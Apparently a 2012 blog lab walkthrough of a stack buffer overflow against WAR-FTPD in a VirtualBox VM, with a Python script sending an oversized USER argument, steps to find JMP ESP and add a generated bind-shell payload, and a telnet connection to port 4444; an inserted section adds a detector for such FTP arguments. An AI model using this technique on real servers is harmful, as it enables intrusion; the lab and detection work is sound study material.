Monday, 17 September 2012

Buffer Overflow

1. In this lab I set up WAR-FTPD and OllyDbg on Windows inside VirtualBox.
2. Check connectivity: ping the target IP, then connect to it with nc (netcat).
3. Run WAR-FTPD and OllyDbg inside the VirtualBox VM.

4. To send more than 1000 bytes of data, run the following command.
5. The result of the command above.
6. Run WAR-FTPD, then OllyDbg, then execute fuzzer.py from the terminal. If OllyDbg shows a crash, the fuzzing succeeded
and the EIP register has been overwritten.
7. To exploit this application you simply need the values of ESP and EIP.
8. Place the payload on the stack:
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 485 bytes of NOP padding reach the saved return address
buffer = b"\x90" * 485
# 4-byte marker (0xDEADBEEF) that should show up in EIP when OllyDbg catches the crash
buffer += b"\xEF\xBE\xAD\xDE"
# pad to 493 bytes, then fill the rest of the 1000-byte buffer with INT3 (0xCC) as a stack marker
buffer += b"\x90" * (493 - len(buffer))
buffer += b"\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101', 21))
data = s.recv(1024)  # read the FTP banner
print("Sending evil data via USER command ...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD' + b'\r\n')
s.close()
print("Finish")

This is the result:
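From the defender's side, the USER argument built above is easy to tell apart from a real login: it is far longer than any username, is mostly non-printable bytes, and carries a run of 0x90 NOP bytes. The following Python 3 detector is an added example, not code from the original post; the thresholds and the sample command lines are constructed for illustration.

```python
#!/usr/bin/env python3
"""Flag FTP control-channel commands whose argument looks like a stack
overflow attempt (added example, not part of the original post)."""

# Constructed thresholds for this example; tune them for the service being protected.
MAX_ARG_LEN = 256              # well above any legitimate FTP username or password
NOP_SLED_MIN = 16              # a run of this many 0x90 bytes is treated as a NOP sled
MAX_NONPRINTABLE_RATIO = 0.1   # FTP arguments are normally printable ASCII

def inspect_ftp_command(line: bytes) -> dict:
    """Parse one FTP command line and return a verdict with the reasons it was flagged."""
    body = line.rstrip(b"\r\n")
    cmd, _, arg = body.partition(b" ")
    reasons = []
    if not cmd.isalpha():
        reasons.append("command is not alphabetic")
    if len(arg) > MAX_ARG_LEN:
        reasons.append(f"argument length {len(arg)} > {MAX_ARG_LEN}")
    if b"\x90" * NOP_SLED_MIN in arg:
        reasons.append("contains a NOP sled (run of 0x90 bytes)")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if arg and nonprint / len(arg) > MAX_NONPRINTABLE_RATIO:
        reasons.append(f"{nonprint} of {len(arg)} argument bytes are non-printable")
    return {"command": cmd.upper().decode("ascii", "replace"),
            "arg_len": len(arg), "reasons": reasons, "suspicious": bool(reasons)}

def scan(lines):
    """Return (index, verdict) for every line that inspect_ftp_command flags."""
    flagged = []
    for i, line in enumerate(lines):
        verdict = inspect_ftp_command(line)
        if verdict["suspicious"]:
            flagged.append((i, verdict))
    return flagged

# Constructed sample traffic: a normal login followed by a USER argument
# laid out like the 1000-byte buffer in the post (NOP padding, 4-byte EIP
# marker, more padding, then 0xCC filler).
SAMPLE_LINES = [
    b"USER alice\r\n",
    b"PASS s3cret\r\n",
    b"USER " + b"\x90" * 485 + b"\xEF\xBE\xAD\xDE" + b"\x90" * 4 + b"\xCC" * 507 + b"\r\n",
]

if __name__ == "__main__":
    for idx, v in scan(SAMPLE_LINES):
        print(f"line {idx}: {v['command']} arg_len={v['arg_len']} -> {'; '.join(v['reasons'])}")
```

Only the third sample line is flagged, on all three checks; the same logic can be run over a pcap's FTP command stream or a server log that records command lines.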
9. To find a JMP ESP instruction, click View and choose the Executable submenu; this is the result.

Then search for the instruction "JMP ESP".


10. The result after customizing the exploit with the JMP ESP address.
11. Open a browser and go to "127.0.0.1:55555".


Choose Payloads, search for the payload "windows shell bind tcp",
fill in the configuration, and click "Generate payloads".
This is the result of "Generate payloads":


12. Open the terminal again and copy the "Generate payload" result into the script.

Save and exit.

13. Open WAR-FTPD and bring it online. Once it is online, open a terminal and run fuzzer.py. If it succeeds, connect with telnet: "telnet 192.168.56.101 4444".
Congratulations!